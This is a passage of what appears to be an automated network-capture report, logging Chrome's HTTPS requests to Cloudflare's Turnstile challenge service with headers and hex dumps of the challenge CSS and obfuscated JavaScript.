                                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                  2025-01-15 02:00:36 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.456734104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:37 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902245eceb0e5e66&lang=auto HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:37 UTC331INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 02:00:37 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 109951
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902245f14f7a0f83-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:37 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                  2025-01-15 02:00:37 UTC1369INData Raw: 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69
                                                                                  Data Ascii: ck%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","feedback_report_output_subti
                                                                                  2025-01-15 02:00:37 UTC1369INData Raw: 2c 67 33 2c 67 37 2c 67 61 2c 67 62 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 67 38 2c 67 39 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 31 32 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 37 33 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 34 30 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 31 38 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 37 35 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 36 34 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 36 37 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74
                                                                                  Data Ascii: ,g3,g7,ga,gb,gB,gC,gG,gH,g8,g9){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1312))/1*(-parseInt(gI(1473))/2)+-parseInt(gI(440))/3+parseInt(gI(718))/4*(-parseInt(gI(1475))/5)+-parseInt(gI(864))/6*(-parseInt(gI(867))/7)+-parseInt
                                                                                  2025-01-15 02:00:37 UTC1369INData Raw: 63 29 7b 68 63 3d 68 62 2c 65 4d 5b 65 5b 68 63 28 31 35 38 34 29 5d 5d 26 26 28 65 4d 5b 68 63 28 31 36 34 36 29 5d 5b 68 63 28 31 30 30 34 29 5d 28 29 2c 65 4d 5b 68 63 28 31 36 34 36 29 5d 5b 68 63 28 31 31 32 38 29 5d 28 29 2c 65 4d 5b 68 63 28 39 35 35 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 63 28 35 35 31 29 5d 5b 68 63 28 31 33 36 31 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 63 28 31 30 37 30 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 63 28 34 34 31 29 5d 5b 68 63 28 31 34 36 34 29 5d 2c 27 65 76 65 6e 74 27 3a 68 63 28 34 33 31 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 63 28 34 34 31 29 5d 5b 68 63 28 31 35 32 39 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 63 28 34 34 31 29 5d 5b 68 63 28 31 32 35 32 29 5d 2c 27 63 6f 64
                                                                                  Data Ascii: c){hc=hb,eM[e[hc(1584)]]&&(eM[hc(1646)][hc(1004)](),eM[hc(1646)][hc(1128)](),eM[hc(955)]=!![],eM[hc(551)][hc(1361)]({'source':hc(1070),'widgetId':eM[hc(441)][hc(1464)],'event':hc(431),'cfChlOut':eM[hc(441)][hc(1529)],'cfChlOutS':eM[hc(441)][hc(1252)],'cod
                                                                                  2025-01-15 02:00:37 UTC1369INData Raw: 30 34 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 42 5b 68 64 28 38 31 31 29 5d 28 68 64 28 33 32 39 29 2c 68 64 28 31 35 30 39 29 29 2c 44 3d 7b 7d 2c 44 5b 68 64 28 31 30 30 33 29 5d 3d 67 2c 44 5b 68 64 28 36 30 35 29 5d 3d 6c 2c 44 2e 63 63 3d 68 2c 44 5b 68 64 28 31 34 30 33 29 5d 3d 6d 2c 44 5b 68 64 28 38 30 37 29 5d 3d 78 2c 45 3d 4a 53 4f 4e 5b 68 64 28 31 31 37 39 29 5d 28 44 29 2c 46 3d 67 37 5b 68 64 28 34 33 33 29 5d 28 45 29 5b 68 64 28 37 36 33 29 5d 28 27 2b 27 2c 68 64 28 31 32 31 32 29 29 2c 42 5b 68 64 28 31 30 34 32 29 5d 28 6b 5b 68 64 28 36 34 39 29 5d 28 27 76 5f 27 2c 65 4d 5b 68 64 28 34 34 31 29 5d 5b 68 64 28 34 38 34 29 5d 29 2b 27 3d 27 2b 46 29 7d 65 6c 73 65 20 72 65 74 75 72 6e 7d 63 61 74 63 68 28 48 29 7b 7d 7d 2c
                                                                                  Data Ascii: 049)]=function(){},B[hd(811)](hd(329),hd(1509)),D={},D[hd(1003)]=g,D[hd(605)]=l,D.cc=h,D[hd(1403)]=m,D[hd(807)]=x,E=JSON[hd(1179)](D),F=g7[hd(433)](E)[hd(763)]('+',hd(1212)),B[hd(1042)](k[hd(649)]('v_',eM[hd(441)][hd(484)])+'='+F)}else return}catch(H){}},
                                                                                  2025-01-15 02:00:37 UTC1369INData Raw: 31 30 34 31 29 2c 65 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 31 3d 30 2c 66 34 3d 7b 7d 2c 66 34 5b 67 4a 28 31 36 35 34 29 5d 3d 66 33 2c 65 4d 5b 67 4a 28 31 30 34 33 29 5d 3d 66 34 2c 66 36 3d 65 4d 5b 67 4a 28 34 34 31 29 5d 5b 67 4a 28 33 33 37 29 5d 5b 67 4a 28 38 32 37 29 5d 2c 66 37 3d 65 4d 5b 67 4a 28 34 34 31 29 5d 5b 67 4a 28 33 33 37 29 5d 5b 67 4a 28 31 35 32 31 29 5d 2c 66 38 3d 65 4d 5b 67 4a 28 34 34 31 29 5d 5b 67 4a 28 33 33 37 29 5d 5b 67 4a 28 34 34 35 29 5d 2c 66 6b 3d 21 5b 5d 2c 66 77 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 33 32 36 29 5d 28 67 4a 28 31 35 31 34 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 69 32 2c 64 2c 65 2c 67 2c 68 2c 69 2c 6a 29 7b 69 66 28 69 32 3d 67 4a 2c 64 3d 7b 27 6a 64 52 4f 4a 27 3a 66 75 6e
                                                                                  Data Ascii: 1041),e));return![]},f1=0,f4={},f4[gJ(1654)]=f3,eM[gJ(1043)]=f4,f6=eM[gJ(441)][gJ(337)][gJ(827)],f7=eM[gJ(441)][gJ(337)][gJ(1521)],f8=eM[gJ(441)][gJ(337)][gJ(445)],fk=![],fw=undefined,eM[gJ(326)](gJ(1514),function(c,i2,d,e,g,h,i,j){if(i2=gJ,d={'jdROJ':fun
                                                                                  2025-01-15 02:00:37 UTC1369INData Raw: 28 31 36 35 36 29 5d 3d 66 58 2c 67 33 5b 67 4a 28 31 31 32 38 29 5d 3d 66 53 2c 67 33 5b 67 4a 28 39 32 31 29 5d 3d 66 59 2c 67 33 5b 67 4a 28 31 30 37 37 29 5d 3d 66 56 2c 67 33 5b 67 4a 28 31 32 31 39 29 5d 3d 66 55 2c 67 33 5b 67 4a 28 35 39 38 29 5d 3d 66 6a 2c 67 33 5b 67 4a 28 31 31 33 36 29 5d 3d 66 51 2c 67 33 5b 67 4a 28 35 33 34 29 5d 3d 66 50 2c 67 33 5b 67 4a 28 33 36 36 29 5d 3d 66 61 2c 67 33 5b 67 4a 28 31 31 32 35 29 5d 3d 66 62 2c 67 33 5b 67 4a 28 31 31 39 30 29 5d 3d 66 78 2c 67 33 5b 67 4a 28 31 36 32 30 29 5d 3d 66 7a 2c 67 33 5b 67 4a 28 33 35 31 29 5d 3d 66 79 2c 67 33 5b 67 4a 28 34 33 37 29 5d 3d 66 4a 2c 67 33 5b 67 4a 28 38 36 30 29 5d 3d 66 49 2c 67 33 5b 67 4a 28 31 31 37 30 29 5d 3d 66 48 2c 67 33 5b 67 4a 28 38 33 30 29 5d
                                                                                  Data Ascii: (1656)]=fX,g3[gJ(1128)]=fS,g3[gJ(921)]=fY,g3[gJ(1077)]=fV,g3[gJ(1219)]=fU,g3[gJ(598)]=fj,g3[gJ(1136)]=fQ,g3[gJ(534)]=fP,g3[gJ(366)]=fa,g3[gJ(1125)]=fb,g3[gJ(1190)]=fx,g3[gJ(1620)]=fz,g3[gJ(351)]=fy,g3[gJ(437)]=fJ,g3[gJ(860)]=fI,g3[gJ(1170)]=fH,g3[gJ(830)]
                                                                                  2025-01-15 02:00:37 UTC1369INData Raw: 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 77 64 76 53 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 72 4c 71 41 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 4b 6d 42 77 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 49 44 4b 72 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 62 41 65 44 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 6d 73 44 46 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 72 65 6a 79 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21
                                                                                  Data Ascii: h,i){return h<i},'wdvSS':function(h,i){return h(i)},'rLqAU':function(h,i){return i*h},'KmBwJ':function(h,i){return h&i},'IDKrP':function(h,i){return i==h},'bAeDV':function(h,i){return h==i},'msDFT':function(h,i){return h<i},'rejyU':function(h,i){return i!
                                                                                  2025-01-15 02:00:37 UTC1369INData Raw: 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 53 3d 7b 7d 2c 53 5b 69 53 28 31 34 30 33 29 5d 3d 42 5b 69 53 28 31 34 32 30 29 5d 2c 53 5b 69 53 28 38 39 33 29 5d 3d 4a 5b 69 53 28 34 34 31 29 5d 5b 69 53 28 31 34 36 34 29 5d 2c 53 5b 69 53 28 39 39 39 29 5d 3d 69 53 28 31 30 33 36 29 2c 49 5b 69 53 28 35 35 31 29 5d 5b 69 53 28 31 33 36 31 29 5d 28 53 2c 27 2a 27 29 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 4b 3c 3c 31 7c 50 26 31 2e 33 38 2c 64 5b 69 53 28 31 33 33 32 29 5d 28 4c 2c 64 5b 69 53 28 38 35 31 29 5d 28 6f 2c 31 29 29 3f 28 4c 3d 30 2c 4a 5b 69 53 28 31 34 31 34 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 46 3d 28 47 2d 2d 2c
                                                                                  Data Ascii: 2,I),I++),delete E[F]}else S={},S[iS(1403)]=B[iS(1420)],S[iS(893)]=J[iS(441)][iS(1464)],S[iS(999)]=iS(1036),I[iS(551)][iS(1361)](S,'*')}else for(P=D[F],C=0;C<I;K=K<<1|P&1.38,d[iS(1332)](L,d[iS(851)](o,1))?(L=0,J[iS(1414)](s(K)),K=0):L++,P>>=1,C++);F=(G--,
                                                                                  2025-01-15 02:00:37 UTC1369INData Raw: 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4d 2c 4c 29 7b 69 66 28 69 56 3d 69 50 2c 64 5b 69 56 28 36 39 30 29 5d 21 3d 3d 69 56 28 31 32 32 30 29 29 64 5b 69 56 28 38 33 36 29 5d 28 4d 29 5b 69 56 28 31 32 31 36 29 5d 5b 69 56 28 31 31 30 31 29 5d 3d 69 56 28 38 34 31 29 3b 65 6c 73 65 7b 66 6f 72 28 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 6f 28 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 33 3e 45 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 56 28 31 30 35 32 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 64 5b 69 56 28 34 37 39 29 5d 28 46 2c 4b 29 3b 29 69 66 28 64 5b 69 56 28 34 39 34 29 5d 28 64 5b 69 56 28 31 34 39 39 29 5d 2c 69 56 28 31 35 38 33 29 29
                                                                                  Data Ascii: s,x,B,C,D,E,F,G,H,I,J,K,M,L){if(iV=iP,d[iV(690)]!==iV(1220))d[iV(836)](M)[iV(1216)][iV(1101)]=iV(841);else{for(s=[],x=4,B=4,C=3,D=[],G=o(0),H=j,I=1,E=0;3>E;s[E]=E,E+=1);for(J=0,K=Math[iV(1052)](2,2),F=1;d[iV(479)](F,K);)if(d[iV(494)](d[iV(1499)],iV(1583))


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.456735104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:38 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902245eceb0e5e66&lang=auto HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:38 UTC331INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 02:00:38 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 121117
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902245f65d1272a7-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:38 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70
                                                                                  Data Ascii: be%20embedded%20into%20a%20parent%20page.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_verifying":"Verifying...","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20p
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 2c 66 55 2c 66 58 2c 66 59 2c 67 6f 2c 67 70 2c 67 74 2c 67 75 2c 67 42 2c 66 56 2c 66 57 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 34 33 33 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 39 39 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 39 39 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 37 37 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 38 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 39 37 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 36 35 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39
                                                                                  Data Ascii: ,fU,fX,fY,go,gp,gt,gu,gB,fV,fW){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(433))/1+parseInt(gI(1399))/2*(parseInt(gI(1199))/3)+parseInt(gI(1277))/4*(-parseInt(gI(518))/5)+-parseInt(gI(797))/6+parseInt(gI(1365))/7+parseInt(gI(9
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 42 4e 42 65 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 79 4a 4f 43 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 65 6f 7a 4e 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 6f 67 72 55 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4f 79 62 6d 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 64 79 4c 6e 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 72 66 6f 74 54 27 3a 67 4d 28 31 37 34 32 29 2c 27 72 45
                                                                                  Data Ascii: :function(h,i){return h(i)},'BNBeC':function(h,i){return i&h},'yJOCj':function(h,i){return h-i},'eozNe':function(h,i){return h==i},'ogrUa':function(h,i){return h<i},'Oybmg':function(h,i){return i&h},'dyLnp':function(h,i){return h!==i},'rfotT':gM(1742),'rE
                                                                                  2025-01-15 02:00:38 UTC1369INData Raw: 28 4f 29 7b 72 65 74 75 72 6e 20 4f 28 29 7d 2c 27 6b 75 72 56 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 51 2c 67 51 29 7b 72 65 74 75 72 6e 20 67 51 3d 67 4f 2c 64 5b 67 51 28 33 35 33 29 5d 28 4f 2c 50 2c 51 29 7d 7d 2c 64 5b 67 4f 28 31 37 34 37 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 4b 3c 69 5b 67 4f 28 31 33 30 37 29 5d 3b 4b 2b 3d 31 29 69 66 28 4c 3d 69 5b 67 4f 28 31 34 36 35 29 5d 28 4b 29 2c 4f 62 6a 65 63 74 5b 67 4f 28 37 33 31 29 5d 5b 67 4f 28 39 34 30 29 5d 5b 67 4f 28 31 32 34 33 29 5d 28 42 2c 4c 29 7c 7c 28 42 5b 4c 5d 3d 46 2b 2b 2c 43 5b 4c 5d 3d 21 30 29 2c 4d 3d 64
                                                                                  Data Ascii: (O){return O()},'kurVl':function(O,P,Q,gQ){return gQ=gO,d[gQ(353)](O,P,Q)}},d[gO(1747)](null,i))return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;K<i[gO(1307)];K+=1)if(L=i[gO(1465)](K),Object[gO(731)][gO(940)][gO(1243)](B,L)||(B[L]=F++,C[L]=!0),M=d
